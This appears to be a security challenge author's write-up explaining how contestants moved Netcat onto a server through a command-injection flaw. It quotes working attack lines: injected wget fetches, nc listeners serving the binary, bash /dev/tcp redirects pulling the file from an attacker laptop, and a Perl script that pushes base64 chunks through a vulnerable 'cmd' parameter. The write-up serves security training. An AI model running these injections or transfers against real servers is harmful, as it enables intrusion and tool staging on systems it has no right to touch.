I purposely designed the challenge so that it did not include Netcat on that server so that you'd have to devise a method for moving it there. Sorry that I didn't include that step in my answers. My answers were getting really long (11 typed pages), so I didn't include every single command. I'm glad you guys asked about this one, because it deserves to be talked about in more detail. Thank you! These challenges are all about sharing techniques among security practitioners, and the techniques associated with this one were fantastic.
Mark Baggett's answer did indeed include a method for getting Netcat there, but he actually sent me his solution in multiple parts. I'm sorry, but I did not include the part of Mark's answer that mentioned how he got nc there. I'll mention his technique below (with an excerpt of his submitted answer part that included the transfer) below as I go through the methods for moving nc to web1.
So, let me tell you about how different people (including Mark), got Netcat to web1. All of these techniques relied on the command-injection flaw on web1:
Method i) Inject a command that invokes wget to connect to Santa's laptop and pull down the Linux version of Netcat. This is the method used by Mark Baggett and many other people. Here is the syntax he specified in the other component of his answer:
"from santa's linux box
nc -l -p 3000 < nc
in webpage we do something like this...
http://web1?vulnerablepage.php?vulnerable=normal;
wget jailmasterlaptop:3000
Give it a minute or so to finish the transfer to the
machine and hits control-c on the netcat on his box
http://web1?vulnerablepage.php?vulnerable=normal;
mv index.html nc
http://web1?vulnerablepage.php?vulnerable=normal;
chmod 777 nc"
It was a nice approach, in that he remembered to move index.html into nc (in effect renaming it), and he even chmod'ed it so that any user (including apache) could read, write, and execute it. I gave Mark extra points for remembering the mv and chmod, because several others forgot it. Richard J. used a similar technique, as did Peter Jackson (who also showed how it could be done with curl). Several others did as well.
Method ii) Inject the echo command to build an FTP command file on web1, and then inject a command to invoke an FTP client to run commands from that file. Zoher used a variation of this technique with the lftp command.
Method iii) Use tftp to move the file by injecting a command to invoke the tftp client on web1. This method depends on Santa's Linux box having a tftpd and web1 having a tftp client, which they may or may not have.
Method iv) Using /dev/tcp on web1. I really liked this approach, because it uses the built-in capabilities of bash on many Linuxes for interacting with /dev/tcp via shell redirects. Several people tried this, but many of them had improper syntax. As you may know, /dev/tcp can be used via bash on some Linux systems (typically non-Debian derived Linuxes) to open an outbound TCP connection. You can push data across that connection easily by just cat'ting or echo'ing it into /dev/tcp. But, how can you pull data across it, for file transfer? Raul Siles' answer included syntax for doing that, as follows:
"Kris made available a copy of the Linux netcat binary through [his own laptop] on port TCP/80 (a little stealthy trick to simulate a web server connection in case someone checks outbound traffic from web1) using netcat:
[Santa's_Laptop] $ nc -l -p 80 < /usr/bin/nc
Using the web-based command injection flaw, Kris launched a series of commands to initiate a connection from web1 to [his own laptop] on port TCP/80 and retrieve the Linux netcat binary. The file was copied under /tmp, as a readable and executable file.
[web1] $ exec 6<>/dev/tcp/Linnie/80
[web1] $ cat <&6 >/tmp/nc
[web1] $ ls -l /tmp/nc
-rw-rw-r-- 1 apache apache 18596 2008-12-30 13:24 /tmp/nc
[web1] $ md5sum /tmp/nc
77e752183c698f76f00c0de5d070314d /tmp/nc
[web1] $ chmod 500 /tmp/nc
[web1] $
"
Ryan L. had a nice variation, which again involved setting up a Netcat listener on Santa's own box, ready to deliver up the netcat executable. He then injected this command into web1:
"cat <
/dev/tcp/<Kris's IP Address>/8080 > /tmp/nc; chmod 755 /tmp/nc;"
These are quite nice techniques, and kudos to Raul and Ryan for using it. Note that both remembered the chmod. Raul even went further and md5sum'med it. Note that Raul, to get the output displayed, must be using an interactive shell, likely delivered via /dev/tcp on another port.
Method iv) Create a perl script that runs on Santa's laptop to encode and move the file. Peter Jackson used this approach, saying it's what he'd rely on if wget or curl were not available. His script base-64 encoded netcat and chopped it up into little parts, transmitting them via the command injection flaw 57 bytes at a time, injecting the echo command into web1 with >> to append the given chunk of Netcat to the file he built on the target. This also was a very cool approach. Here's Peter's code:
-------
#!/usr/bin/perl
use MIME::Base64 qw(encode_base64);
use LWP 5.64;
my $browser = LWP::UserAgent->new;
# read netcat binary in 57 byte chucks and submit
# base64 encoded string to the vulntiable URL
open(FILE, "nc") or die "$!";
while (read(FILE, my $buf, 57)) {
my $base64chr = encode_base64($buf);
# remove the line break
chomp($base64chr);
my $response = $browser->post( '
http://web1/vuln.cgi',
[ 'cmd' => "echo $base64chr >> /tmp/.../nc.base64" ]
);
die "$url error: ", $response->status_line
unless $response->is_success;
}
close(FILE);
-----
There were some other variations and approaches, but those were the main ones.
Again, as you can see, these answers were stellar, which is why we saw so many honorable mentions.
Thanks again, guys!
--Ed.
Show Posts
Network Pen Testing : Ruby on Rails Vulnerabilities/Attacks in BackTrack 5 r3
